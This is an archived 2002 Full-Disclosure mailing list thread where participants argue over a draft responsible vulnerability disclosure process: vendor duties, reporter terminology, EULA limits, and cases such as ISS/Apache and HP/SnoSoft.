Mailing List Archive

Re: it\'s all about timing
>It is interesting that the people screaming loudest for some sort of
>order in the submission of bugs, are in fact non-bug hunters at
>all. Rather a vocal group academics who intent of have their name on a
>draft or ratified document they came up with. Sure some may have
>posted a few findings but none are consistently doing so, and the bug
>hunters, sure don't sound like they need some else telling them what
>to do. You don't hear them crying to for order.
>
>Wonder why that is.

I think it's because there are more "consumers" of vulnerability
information than just other bug hunters, for example, people who want
to remove those bugs from their vulnerable systems. I would be very
interested in hearing the experience of bug hunters who are also
responsible for the security of large, diverse networks; they may see
this situation from both angles.

The audience for a security advisory includes individuals and
organizations with many different needs for security information.
Having some order to disclosure can make it easier for people to
identify the vulnerabilities that they care about, and to secure their
systems.

The audience includes:

- System administrators, who often need to manage or support dozens of
products

- Security administrators, who need to research and understand
hundreds of vulnerabilities across their enterprise, and who may not
fully understand all the products that have been deployed at their
enterprise.

- Vulnerability database maintainers, who need to research,
understand, and/or verify thousands of vulnerabilities. Since
databases are relied upon by many people, errors or inconsistencies
in your own advisories will be multiplied greatly.

For a list of some of the challenges in vulnerability database
maintenance, see my post at:
http://lists.netsys.com/pipermail/full-disclosure/2002-July/000568.html

- Vulnerability researchers, who may have specialized research
interests that require greater detail (or different types of detail)
than most of your audience.

- Potential customers, or the consultants that they rely on

- Existing customers who care about security issues but do not
regularly read advisories


Sysadmins and security admins often have time pressures that may make
it difficult for them to sift through "noisy" vulnerability
information - incomplete, inaccurate, etc. If an advisory is released
without a vendor patch, the admins then have to keep track of which
bugs are outstanding, and figure out which researchers they can trust
when there is no vendor patch.

One of the roles of vulnerability databases is to sift through the
"noise" and make it easier to access vulnerability information. But
since it's resource-intensive for experienced vulnerability database
maintainers to manage the noise, it seems reasonable to assume that
admins may have difficulty managing the same information... or at
least figuring out which information is actually correct. The job is
only going to get harder with the increasing de-centralization of
vulnerability information.

In my experience, the most informative and accurate security
advisories offer a mixture of the details that researchers provide,
along with the correct version, fix and actual cause of the problem,
as is often best known by vendors.

High-quality information may not be needed by everyone, and some
people may not think it's important, but better information means
better security overall.

- Steve
Re: Re: it\'s all about timing [ In reply to ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


It is very unclear as to what it is that you are really after. Who are these people "Vulnerability researchers", who's label is this? Is this a profession of some sorts?

Are thes professionals now not adhereing to some suitable reporting method where they do in fact alert the vendor in private, work with that vendor in private, and then release the advisory? Is this not the case already? If so, what is the need for this to be set out in stone?

Or do you mean the one-off vulnerabilty report, the one that some individiual stumbles upon and sends it off to the lists. Are you trying to harness them? Do you think some standard setout on what do do with the reporting is going to trickle down to the individual man in the street and he's going to (a) know about it (b) be bothered to follow the method if he did.

Let us say you have two sets of bug hunters

(a) professionals. certainly they know what they are doing, why they are doing it and how best to leverage it to bring business to their company. They WILL report them the reponsible way

(b) one-off individuals who are fly-by-nighters. find a bug, report it to a list and see you later. No time no interest to seek out some rule or protocol on how to report the bug. They have no interest in getting involved in some laborious process with a vendor. They can either do nothing with it or they can submit it to the nearest mailing list and be done with it.

a) above doesn't need a guidline and b) above you have no hope in harnessing or educating as the interest is simply not there.

Is there then a third set out there that needs this guidence everyone is hollering about?

On Fri, 2 Aug 2002 14:07:53 -0400 (EDT), full-disclosure@lists.netsys.com wrote:
>>It is interesting that the people screaming loudest for some sort of
>>order in the submission of bugs, are in fact non-bug hunters at
>>all. Rather a vocal group academics who intent of have their name on a
>>draft or ratified document they came up with. Sure some may have
>>posted a few findings but none are consistently doing so, and the bug
>>hunters, sure don't sound like they need some else telling them what
>>to do. You don't hear them crying to for order.
>>
>>Wonder why that is.
>
>I think it's because there are more "consumers" of vulnerability
>information than just other bug hunters, for example, people who want
>to remove those bugs from their vulnerable systems. I would be very
>interested in hearing the experience of bug hunters who are also
>responsible for the security of large, diverse networks; they may see
>this situation from both angles.
>
>The audience for a security advisory includes individuals and
>organizations with many different needs for security information.
>Having some order to disclosure can make it easier for people to
>identify the vulnerabilities that they care about, and to secure their
>systems.
>
>The audience includes:
>
>- System administrators, who often need to manage or support dozens of
> products
>
>- Security administrators, who need to research and understand
> hundreds of vulnerabilities across their enterprise, and who may not
> fully understand all the products that have been deployed at their
> enterprise.
>
>- Vulnerability database maintainers, who need to research,
> understand, and/or verify thousands of vulnerabilities. Since
> databases are relied upon by many people, errors or inconsistencies
> in your own advisories will be multiplied greatly.
>
> For a list of some of the challenges in vulnerability database
> maintenance, see my post at:
> http://lists.netsys.com/pipermail/full-disclosure/2002-July/000568.html
>
>- Vulnerability researchers, who may have specialized research
> interests that require greater detail (or different types of detail)
> than most of your audience.
>
>- Potential customers, or the consultants that they rely on
>
>- Existing customers who care about security issues but do not
> regularly read advisories
>
>
>Sysadmins and security admins often have time pressures that may make
>it difficult for them to sift through "noisy" vulnerability
>information - incomplete, inaccurate, etc. If an advisory is released
>without a vendor patch, the admins then have to keep track of which
>bugs are outstanding, and figure out which researchers they can trust
>when there is no vendor patch.
>
>One of the roles of vulnerability databases is to sift through the
>"noise" and make it easier to access vulnerability information. But
>since it's resource-intensive for experienced vulnerability database
>maintainers to manage the noise, it seems reasonable to assume that
>admins may have difficulty managing the same information... or at
>least figuring out which information is actually correct. The job is
>only going to get harder with the increasing de-centralization of
>vulnerability information.
>
>In my experience, the most informative and accurate security
>advisories offer a mixture of the details that researchers provide,
>along with the correct version, fix and actual cause of the problem,
>as is often best known by vendors.
>
>High-quality information may not be needed by everyone, and some
>people may not think it's important, but better information means
>better security overall.
>
>- Steve
>_______________________________________________
>Full-Disclosure - We believe in it.
>Full-Disclosure@lists.netsys.com
>http://lists.netsys.com/mailman/listinfo/full-disclosure
>

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wmYEARECACYFAj1K0fsfHGNob29zZS5hLnVzZXJuYW1lQGh1c2htYWlsLmNvbQAKCRDT
5JkCl0iMkPAqAJkBOo3qKq5TgVaAvHRX3zJ3DHVX+gCglYKof6O+KpQ04nyoSA1rHwvH
5Gg=
=kqdi
-----END PGP SIGNATURE-----


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
Re: Re: it\'s all about timing [ In reply to ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Let me ask you this, who _exactly_ is bound by the END USER LICENSE AGREEMENT?

Why not have the vendor include in it, "if you find a bug in our product, agree to inform us and us only until we resolve the issue"

I come to your house and play on your machine. You are the party who installed the software and selected "I agree" when you installed that piece of software. Now I find a bug and do with it as I see fit. Is this correct?

I think one of the anti virus companies tried to pull a similar stung in the EULA where by accepting installation you were not allowed to write a review of their product without their permission. In New York or New Jersey possibly, the States Attorney shot it down in two seconds. Cannot remember the vendor Mckafee or nai or symantec or something.

Any in the scenario above where I use your machine and installed software and find a bug, given there is that condition in the EULA to which you, the party who installed the software and agreed to the terms, am I now bound too?

On Fri, 2 Aug 2002 14:07:53 -0400 (EDT), full-disclosure@lists.netsys.com wrote:
>>It is interesting that the people screaming loudest for some sort of
>>order in the submission of bugs, are in fact non-bug hunters at
>>all. Rather a vocal group academics who intent of have their name on a
>>draft or ratified document they came up with. Sure some may have
>>posted a few findings but none are consistently doing so, and the bug
>>hunters, sure don't sound like they need some else telling them what
>>to do. You don't hear them crying to for order.
>>
>>Wonder why that is.
>
>I think it's because there are more "consumers" of vulnerability
>information than just other bug hunters, for example, people who want
>to remove those bugs from their vulnerable systems. I would be very
>interested in hearing the experience of bug hunters who are also
>responsible for the security of large, diverse networks; they may see
>this situation from both angles.
>
>The audience for a security advisory includes individuals and
>organizations with many different needs for security information.
>Having some order to disclosure can make it easier for people to
>identify the vulnerabilities that they care about, and to secure their
>systems.
>
>The audience includes:
>
>- System administrators, who often need to manage or support dozens of
> products
>
>- Security administrators, who need to research and understand
> hundreds of vulnerabilities across their enterprise, and who may not
> fully understand all the products that have been deployed at their
> enterprise.
>
>- Vulnerability database maintainers, who need to research,
> understand, and/or verify thousands of vulnerabilities. Since
> databases are relied upon by many people, errors or inconsistencies
> in your own advisories will be multiplied greatly.
>
> For a list of some of the challenges in vulnerability database
> maintenance, see my post at:
> http://lists.netsys.com/pipermail/full-disclosure/2002-July/000568.html
>
>- Vulnerability researchers, who may have specialized research
> interests that require greater detail (or different types of detail)
> than most of your audience.
>
>- Potential customers, or the consultants that they rely on
>
>- Existing customers who care about security issues but do not
> regularly read advisories
>
>
>Sysadmins and security admins often have time pressures that may make
>it difficult for them to sift through "noisy" vulnerability
>information - incomplete, inaccurate, etc. If an advisory is released
>without a vendor patch, the admins then have to keep track of which
>bugs are outstanding, and figure out which researchers they can trust
>when there is no vendor patch.
>
>One of the roles of vulnerability databases is to sift through the
>"noise" and make it easier to access vulnerability information. But
>since it's resource-intensive for experienced vulnerability database
>maintainers to manage the noise, it seems reasonable to assume that
>admins may have difficulty managing the same information... or at
>least figuring out which information is actually correct. The job is
>only going to get harder with the increasing de-centralization of
>vulnerability information.
>
>In my experience, the most informative and accurate security
>advisories offer a mixture of the details that researchers provide,
>along with the correct version, fix and actual cause of the problem,
>as is often best known by vendors.
>
>High-quality information may not be needed by everyone, and some
>people may not think it's important, but better information means
>better security overall.
>
>- Steve
>_______________________________________________
>Full-Disclosure - We believe in it.
>Full-Disclosure@lists.netsys.com
>http://lists.netsys.com/mailman/listinfo/full-disclosure
>

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wmYEARECACYFAj1K5NMfHGNob29zZS5hLnVzZXJuYW1lQGh1c2htYWlsLmNvbQAKCRDT
5JkCl0iMkKqkAJ4khfHRcswINj5QVP5ayNvqvK3KzACeO3Mn1FHsdlUUngoND4uYTUxg
j7k=
=+dvP
-----END PGP SIGNATURE-----


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
Re: Re: it\'s all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>It is very unclear as to what it is that you are really after. Who are
>these people "Vulnerability researchers", who's label is this?

It's an RFPolicy-ism. Alternate terms are "reporter" (which covers
"bug hunters" and "people from the press") and "notifier" (which is
probably more accurate than "researcher," because the notifier might
not be the person who discovered the issue). I'm leaning towards
"notifier."

>Are thes professionals now not adhereing to some suitable reporting
>method where they do in fact alert the vendor in private, work with
>that vendor in private, and then release the advisory? Is this not the
>case already?

Based on an informal study I've done of about 350 researcher reports
from early 2002, approximately 50% of the vulnerabilities were
released without notifying the vendor, and about 20% of those reports
included full exploit code. (NOTE: the data is presently incomplete;
but I hope to publish a full report in the future).

But even in the case where the vendor is notified ahead of time, one
needs only to look at the recent HP/SnoSoft situation to see that
there are different opinions on how disclosure should happen. Going a
little further back, the ISS/Apache situation also demonstrated a
variety in how professionals handle vulnerability reporting. We may
agree on the general notion of "give vendors some warning," but when
you get down to the nitty gritty details - like *how much* warning,
and how much effort the researcher should make, and how the vendors
should respond - suddenly you realize that there's a lot of variety.

You speak of "harnessing" vulnerability researchers. A number of
people have said that the current RVDP draft asks too much of
researchers, including Georgi Guninski and Rain Forest Puppy (and some
vendors). That feedback will be taken into account in the next
version.

In the meantime, the current RVDP draft already has a number of
suggestions for vendors:

3.3.1 Vendor Responsibilities

1) The Vendor MUST make it as easy as possible for Reporters,
Coordinators, Customers, and the Security Community to notify the
Vendor of vulnerabilities.

as well as:

3) The Vendor SHOULD ensure that its staff knows how to recognize a
reported security issue and direct it to the Security Response
Capability. This recommendation applies to staff who provide support
online, over the telephone, in person, or through some other means by
which reporters may interact with the Vendor.

as well as:

6) The Vendor MUST provide a facility for individuals or
organizations who are not Customers to report vulnerabilities. The
Vendor SHOULD NOT require (1) an active technical support number, (2)
telephone access that is not toll-free, or (3) user registration for
a web site or other facility that would be used for reporting.


If more vendors follow the recommendations in the current draft, it
will be easier for people to report vulnerabilities to them, which I
think is a good thing.


>Or do you mean the one-off vulnerabilty report, the one that some
>individiual stumbles upon and sends it off to the lists.

If the one-off person knows about security-related mailing lists, then
hopefully they'll know something of disclosure issues.

>Are you trying to harness them? Do you think some standard setout on
>what do do with the reporting is going to trickle down to the
>individual man in the street and he's going to (a) know about it (b)
>be bothered to follow the method if he did.

If there is enough awareness of disclosure issues in the IT community,
then hopefully this won't happen as much. However, as you say, there
will always be people who won't follow the disclosure guidelines.

You may be surprised to learn that the RVDP draft specifically tells
vendors that they should be prepared for such a situation:

3.3.1 Vendor Responsibilities

7) The Vendor SHOULD recognize that inexperienced or malicious
reporters may not use proper notification, and define its own
procedures for handling such cases.


I've mentioned at least 4 vendor requirements from the current draft,
which would make the notification process easier for researchers.

>Is there then a third set out there that needs this guidence everyone
>is hollering about?

I think so, and that's the people who are somewhere in between - maybe
they're not professionals, but maybe they like to do research for fun,
to analyze the software they use themselves, to build a resume,
whatever (and before someone misinterprets what I just said, I
personally don't think that there's anything wrong with doing research
for resume-building). Sometimes, it seems that researchers start out
by releasing advisories without notifying the vendor, then as they
gain experience, they work with the vendor more and more. But I don't
have any hard numbers to back that up. Indeed, the whole area of
disclosure is woefully short of hard numbers.

- Steve
Re: Re: it\'s all about timing [ In reply to ]
In the profound words of Steven M. Christey:
>
[snip...]
> If there is enough awareness of disclosure issues in the IT community,
> then hopefully this won't happen as much. However, as you say, there
> will always be people who won't follow the disclosure guidelines.
>
> You may be surprised to learn that the RVDP draft specifically tells
> vendors that they should be prepared for such a situation:
>
> 3.3.1 Vendor Responsibilities
>
> 7) The Vendor SHOULD recognize that inexperienced or malicious
> reporters may not use proper notification, and define its own
> procedures for handling such cases.

Why must they automatically be labelled either "inexperienced"
or "malicious", if they don't choose to follow the chosen guidelines??
Suppose they simply disagree with those guidelines? They may feel
it's not THEIR job to spend a large portion of their time trying to
educate the vendor about their own broken software... They may feel
they have no obligations in that area, at all... They may simply
be releasing the information to the public out of pure good will,
when they could have instead simply kept it to themselves, leaving
everyone still at risk to the issue, and completely ignorant of it...
Surely you wouldn't think THAT is a preferable situation to informing
the public without prior vendor notification? Because, if you start
throwing such labels around, that's precisely what such people will
do... And, *I*, for one, really would prefer to be informed, rather
than remain in the dark; and, to hell with the software vendor! At
least if I know about a problem, I can take steps to protect myself,
even if the vendor can't/won't...

So, if you're still modifying this "policy", I would really
suggest changing that language... Just drop the whole labelling
of such people, and simply say something like, "Some reporters
may not follow these guidelines for notification."... No judging
them or their reasons for doing so... Not everyone is going to
agree with you, no matter WHAT you come up with; and, negatively
labelling all those who don't agree is really not very nice, and
in this case, would be highly counter-productive, I think...

Basically, I don't think any bug-reporter should EVER be
attacked, no matter what policy they followed (if any)... Remember,
they are doing this on their own time... They don't have to tell
anyone at all... Be thankful they are telling the public at all,
rather than bitch about HOW they choose to do so... (Yes, yes,
I think most people will agree it would be BEST to do things a
certain way... And, that would be really NICE if everyone did
that... But, it shouldn't be any kind of requirement, where
everyone who doesn't do it is an instant asshole... Not everyone
always has time/desire/whatever to be the nicest and most polite
they possibly can be... And, we shouldn't go around trying to
codify exactly HOW nice and polite everyone MUST be...)

--
||========================================================================||
|| Rob Seace || URL || ras@magrathea.com ||
|| AKA: Agrajag || http://www.magrathea.com/~ras/ || rob@wordstock.com ||
||========================================================================||
"Can we drop your ego for a moment? This is important." "If there's anything
more important than my ego around, I want it caught and shot now." - THGTTG
Re: Re: it\'s all about timing [ In reply to ]
All these proposals for responsible vulnerability reporting have as a
major problem, the vendors first in my eyes. I can't count the times I
see folks asking in various lists "how do I contact such&such vendor to
report an issue", and long ago quit counting the times I've seen
vulnerability reports in the various lists where the vendor had not
responded, or their response was like M$ tends to be, "we do not consider
this a vulnerability nor a serious issue" when in fact it is. How many
times now has M$ changed it's vulnerability/security issues reporting
address/proceedures? I think those finding and sicovering these issues
would be more willing to work within a responsible structure if the
vendors would adopt a responsible attitude and process on their end.
Afterall what the vendors recive is free information and debugging on
their product<s>/code, free research, and the man hours of countless
folks, which costs them nothing, no paychecks, no benefits to payout, not
even unenjoyment insurance, if they would act responsibly to begin
with. Afterall, there was a reason full disclosure and the various lists
came to be in the first place, frustration due to vendors not taking a
responsible attitude towards both the code/products they push to market as
well as their customers.

Thanks,

Ron DuFresne



On Fri, 2 Aug 2002, Steven M. Christey wrote:

>
> choose.a.username@hushmail.com said:
>
> >It is very unclear as to what it is that you are really after. Who are
> >these people "Vulnerability researchers", who's label is this?
>
> It's an RFPolicy-ism. Alternate terms are "reporter" (which covers
> "bug hunters" and "people from the press") and "notifier" (which is
> probably more accurate than "researcher," because the notifier might
> not be the person who discovered the issue). I'm leaning towards
> "notifier."
>
> >Are thes professionals now not adhereing to some suitable reporting
> >method where they do in fact alert the vendor in private, work with
> >that vendor in private, and then release the advisory? Is this not the
> >case already?
>
> Based on an informal study I've done of about 350 researcher reports
> from early 2002, approximately 50% of the vulnerabilities were
> released without notifying the vendor, and about 20% of those reports
> included full exploit code. (NOTE: the data is presently incomplete;
> but I hope to publish a full report in the future).
>
> But even in the case where the vendor is notified ahead of time, one
> needs only to look at the recent HP/SnoSoft situation to see that
> there are different opinions on how disclosure should happen. Going a
> little further back, the ISS/Apache situation also demonstrated a
> variety in how professionals handle vulnerability reporting. We may
> agree on the general notion of "give vendors some warning," but when
> you get down to the nitty gritty details - like *how much* warning,
> and how much effort the researcher should make, and how the vendors
> should respond - suddenly you realize that there's a lot of variety.
>
> You speak of "harnessing" vulnerability researchers. A number of
> people have said that the current RVDP draft asks too much of
> researchers, including Georgi Guninski and Rain Forest Puppy (and some
> vendors). That feedback will be taken into account in the next
> version.
>
> In the meantime, the current RVDP draft already has a number of
> suggestions for vendors:
>
> 3.3.1 Vendor Responsibilities
>
> 1) The Vendor MUST make it as easy as possible for Reporters,
> Coordinators, Customers, and the Security Community to notify the
> Vendor of vulnerabilities.
>
> as well as:
>
> 3) The Vendor SHOULD ensure that its staff knows how to recognize a
> reported security issue and direct it to the Security Response
> Capability. This recommendation applies to staff who provide support
> online, over the telephone, in person, or through some other means by
> which reporters may interact with the Vendor.
>
> as well as:
>
> 6) The Vendor MUST provide a facility for individuals or
> organizations who are not Customers to report vulnerabilities. The
> Vendor SHOULD NOT require (1) an active technical support number, (2)
> telephone access that is not toll-free, or (3) user registration for
> a web site or other facility that would be used for reporting.
>
>
> If more vendors follow the recommendations in the current draft, it
> will be easier for people to report vulnerabilities to them, which I
> think is a good thing.
>
>
> >Or do you mean the one-off vulnerabilty report, the one that some
> >individiual stumbles upon and sends it off to the lists.
>
> If the one-off person knows about security-related mailing lists, then
> hopefully they'll know something of disclosure issues.
>
> >Are you trying to harness them? Do you think some standard setout on
> >what do do with the reporting is going to trickle down to the
> >individual man in the street and he's going to (a) know about it (b)
> >be bothered to follow the method if he did.
>
> If there is enough awareness of disclosure issues in the IT community,
> then hopefully this won't happen as much. However, as you say, there
> will always be people who won't follow the disclosure guidelines.
>
> You may be surprised to learn that the RVDP draft specifically tells
> vendors that they should be prepared for such a situation:
>
> 3.3.1 Vendor Responsibilities
>
> 7) The Vendor SHOULD recognize that inexperienced or malicious
> reporters may not use proper notification, and define its own
> procedures for handling such cases.
>
>
> I've mentioned at least 4 vendor requirements from the current draft,
> which would make the notification process easier for researchers.
>
> >Is there then a third set out there that needs this guidence everyone
> >is hollering about?
>
> I think so, and that's the people who are somewhere in between - maybe
> they're not professionals, but maybe they like to do research for fun,
> to analyze the software they use themselves, to build a resume,
> whatever (and before someone misinterprets what I just said, I
> personally don't think that there's anything wrong with doing research
> for resume-building). Sometimes, it seems that researchers start out
> by releasing advisories without notifying the vendor, then as they
> gain experience, they work with the vendor more and more. But I don't
> have any hard numbers to back that up. Indeed, the whole area of
> disclosure is woefully short of hard numbers.
>
> - Steve
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure@lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
Re: Re: it\'s all about timing [ In reply to ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Having just read that article, seems nothing more like guess work.

"security advisory"
"vulnerability researchers"

What are the definitions for these?

Most of the time the vendor discounts a finding as being nothing more than a bug. No security implications. Then someone else takes it and manages to do something with it that does have security implications. Then again, what is the definition of "security". For a vulnerability researcher, unless this is now a trade and a recognised job title with certification from some "school", who or what exactly is that?

Joe Six-Pack installs a piece of software, he finds that pressing 1,2,3 on the key board at the same time deletes his hard drive. Thinks that's mighty unusual. Tells Joe 12-Pack, who tells him there is some mailing list you can send bugs to called bugtraq, so he posts it there. Knows nothing about anything. Certainly isn't a "vulnerability researcher" and certainly hasn't posted a "security advisory". Doesn't know what he has and doesn't know what he is doing. Is the vendor going to come after them and sue them?

Then on the other hand, you have some major vendors who go out of their way to discount what a some else finds as being nothing more than a "bug", that someone else follows the procedures, creates what they think is a ""security advisory" and nothing gets fixed. A series of insurmountable hurdles or mitigating factors make it a bug and not a security matter at all. Hurdles like being enticed to visit websites on the internet or being enticed to click on links in emails. Someone else may take that publicised info and re-work it so that the hurdles are overcome, it may be a succession of 10 individuals inputting each one step closer. Should all this be funnelled to the vendor when they've already dismissed the original as nothing more than bug?

Two bad examples but someone is going to have to define what a vulnerability is, what a security advisory is and what vulnerability researchers are.



On Thu, 1 Aug 2002 01:45:46 -0400 (EDT), full-disclosure@lists.netsys.com wrote:
>The Responsible Disclosure Process draft specifically allows for
>researchers to release vulnerability information if the vendor is not
>sufficiently responsive. Some people may disagree with the delay of
>30 days between initial notification and release, but I don't think
>there are good stats on how long it really takes vendors to fully
>address vulnerability reports - open or closed source, freeware or
>commercial. Let's take a recent example - how much coordination had
>to happen for the zlib vulnerability? It seems reasonable to assume
>that it took more than a day. And the controversial "grace period"
>has the interesting distinction of being used by both Microsoft and
>Theo de Raadt.
>
>Researchers can help to shed light in this area by publishing
>disclosure histories along with their advisories. (By the way, vendor
>advisories rarely include such information.)
>
>While the response to the proposal focused almost exclusively on how
>it impacts researchers, it lays out a number of requirements for
>vendors, primarily that they (a) make it easy for people to file
>vulnerability reports, (b) be responsive to incoming vulnerability
>reports, and (c) address the issues within a reasonable amount of
>time.
>
>IMHO, it makes a stronger impression when someone releases a security
>advisory with an extensive disclosure history that says how much they
>tried to resolve the issue with the vendor, before they released.
>
>Those who are interested in the legal aspects of "responsible
>disclosure" are encouraged to read the article by Mark Rasch at
>http://online.securityfocus.com/columnists/66. The article basically
>says that the adoption of community standards could protect
>researchers who disclose issues responsibly, while it could also help
>vendors who seek legal recourse against researchers who are not
>responsible (for some definition of "responsible"). The former could
>happen with a community standard. The latter may already be happening
>without one.
>
>This email is my personal opinion, not my employer's.
>
>- Steve
>(co-author of the aforementioned Responsible Disclosure proposal,
>which is presently quiet but not dead, but will always be subject to
>public feedback)
>_______________________________________________
>Full-Disclosure - We believe in it.
>Full-Disclosure@lists.netsys.com
>http://lists.netsys.com/mailman/listinfo/full-disclosure
>

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wmYEARECACYFAj1OsE8fHGNob29zZS5hLnVzZXJuYW1lQGh1c2htYWlsLmNvbQAKCRDT
5JkCl0iMkKceAKCdna411CiJdVUoKLwRZYnTu9/1bwCfRTzt0fbS/v4m+nDsg/cHORRe
/OA=
=DvzJ
-----END PGP SIGNATURE-----


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
Re: Re: it\'s all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>"security advisory"
>"vulnerability researchers"
>
>What are the definitions for these?

While "security advisory" implies a structured, comprehensive
vulnerability report, in general I mean any report of an issue with IT
security implications. SnoSoft's initial publication of the HP su
issue wasn't an advisory per se, but it was a vulnerability report.

I use "vulnerability researchers" more out of habit than anything; as
you say:

>For a vulnerability researcher, unless this is now a trade and a
>recognised job title with certification from some "school", who or
>what exactly is that? Joe Six-Pack installs a piece of software, he
>finds that pressing 1,2,3 on the key board at the same time deletes
>his hard drive. Thinks that's mighty unusual. Tells Joe 12-Pack, who
>tells him there is some mailing list you can send bugs to called
>bugtraq, so he posts it there. Knows nothing about anything. Certainly
>isn't a "vulnerability researcher" and certainly hasn't posted a
>"security advisory".

It's situations like these that caused us to try the term "reporter"
in the RVDP draft, as in "person/entity who reports the issue." But
as mentioned in another post, I'm leaning more towards "notifier."

>Doesn't know what he has and doesn't know what he is doing. Is the
>vendor going to come after them and sue them?

Hopefully not, but it appears that you and I disagree on whether
disclosure standards will help or hurt the situation.

>Then again, what is the definition of "security".

I think we'd need a whole new list for that ;-)

>Then on the other hand, you have some major vendors who go out of
>their way to discount what a some else finds as being nothing more
>than a "bug", that someone else follows the procedures, creates what
>they think is a ""security advisory" and nothing gets fixed.

The RVDP draft tries to recognize that there can be technical
disagreements, but short of recommending that a third party
coordinator to "negotiate," we don't really try to address the issue.
On the other hand, third parties such as w00w00 have proven effective
in the past.

As you have been describing in your posts, there are a number of
complex issues related to disclosure.

>A series of insurmountable hurdles or mitigating factors make it a bug
>and not a security matter at all. Hurdles like being enticed to visit
>websites on the internet or being enticed to click on links in
>emails. Someone else may take that publicised info and re-work it so
>that the hurdles are overcome, it may be a succession of 10
>individuals inputting each one step closer. Should all this be
>funnelled to the vendor when they've already dismissed the original as
>nothing more than bug?

If the vendor disagrees with the severity, then it seems reasonable
for the "notifier" to include the vendor's point of view in their
public "advisory." Then, as you point out, follow-on discussion may
reveal additional implications of the issue.

>Two bad examples but someone is going to have to define what a
>vulnerability is

That's not particularly easy. Everybody has different definitions,
partially due to different levels of "risk aversion."

>what a security advisory is and what vulnerability researchers are.

The current short definition of "reporter/notifier" is:

A [Reporter/Notifier] is the individual or organization that
informs (or attempts to inform) the Vendor of the vulnerability.
Note that the [Reporter/Notifier] may not have been the initial
discoverer of the problem.

The current draft doesn't include any definition of "security
advisory," so that will need to be addressed.

Thanks,
- Steve
Re: Re: it\'s all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>Who is doing who the favor. Someone who spends hundereds of dollars or
>thousands of dollars and finds a problem in that vendors product. Or
>the vendor for allowing you, the customer, to buy their product? You
>should be honored by giving your hard earned money to me the
>vendor. Here take my product and tough shit if it doesn't work well.
>
>How about fuck the vendor. Find a bug, post away 0-day? Or give me
>money back for the defective product you sold me plus compensation for
>the time and effort it took me to fix the problems your software did
>on my machine.

I'm just curious, do people on this list think that freeware vendors
should be treated differently than this? Do you think they should be
given more (or less) time to address the issues? How about commercial
vendors whose products are open source? How much does a vendor's past
performance (or the perception of past performance) come into play?

- Steve
Re: Re: it\'s all about timing [ In reply to ]
"Robert A. Seace" <ras@slartibartfast.magrathea.com> said:

>> 3.3.1 Vendor Responsibilities
>>
>> 7) The Vendor SHOULD recognize that inexperienced or malicious
>> reporters may not use proper notification, and define its own
>> procedures for handling such cases.
>
> Why must they automatically be labelled either "inexperienced"
>or "malicious", if they don't choose to follow the chosen guidelines??
>Suppose they simply disagree with those guidelines? They may feel
>it's not THEIR job to spend a large portion of their time trying to
>educate the vendor about their own broken software...
>
>... if you're still modifying this "policy", I would really
>suggest changing that language... Just drop the whole labelling
>of such people, and simply say something like, "Some reporters
>may not follow these guidelines for notification."...

Good point, duly noted.

Many of the items in the draft try to give a rationale for why the
item is there. In this case, the rationale is mixed with the
recommendation, and as you point out, it's incomplete anyway. There
are a number of reasons why someone may not use "proper" notification.

Thanks,
- Steve
Re: Re: it\'s all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>What are the penalties now for not abiding by this guideline, or any
>other guideline that might be out there.

We explicitly stayed away from defining what the penalties are.
That's outside the scope of the recommendations - the "marketplace"
may decide, or perhaps, the legal community may decide. If there are
no guidelines at all, then perhaps "the government" will decide (which
obviously has its own issues, in an international community such as
information security.)

>Pretend that your (as in this) guideline was already implemented. How
>on earth would you expect it to have stifled the release by both the
>individual in (or a part of) SnoSoft and ISS.

It at least establishes a point of discussion. Whether you agree with
the particular points of the draft or not, they can be compared to the
facts (or apparent facts) of the situation.

For the ISS/Apache issue, it seems that nobody disputes that ISS gave
Apache less than 7 days to respond to the initial report, before they
published. This is not consistent with the spirit of the disclosure
draft (I just took a look at it, and while it requires the vendor to
respond within 7 days, it doesn't have a complementary suggestion that
the reporter should give 7 days to the vendor! whoops). In the
ISS/Apache case, we have the further complication that multiple
vendors were involved (a difficult issue that is not addressed by the
current draft, except in its recommendations for involving
coordinators). Without community-defined guidelines, there are no
clear boundaries to say whether ISS did things "reasonably" or not.

The SnoSoft/HP issue is more complicated and not cleanly addressed by
the disclosure draft, which does not cover accidental or unauthorized
releases, and is not comprehensive on the role of third party
coordinators. I think it demonstrates some of the complexity in
vulnerability disclosure. Some people have argued that this means
that there shouldn't be *any* guidelines, but I believe that we should
try to be as detailed as possible in the guidelines to reduce
confusion, provide flexibility where it is needed, and do what is
possible to avoid regulations that may come from outside the IT
community.

- Steve
Re: Re: it\'s all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>>Based on an informal study I've done of about 350 researcher reports
>>from early 2002, approximately 50% of the vulnerabilities were
>>released without notifying the vendor, and about 20% of those reports
>>included full exploit code
>
>Your informal study of 50% of 350 researcher reports. What exactly
>does that mean?
>
>How many of those released were one-offs? 1 person never to be seen
>from again. How many of them were "repeat offenders" 10 of the same
>people releasing the bulk of them?

Unfortunately, I don't have that information, as the discloser's
identity was not collected (I was mostly interested in the disclosure
"timelines".) But that's a good question...

>Your number 6 below:
>
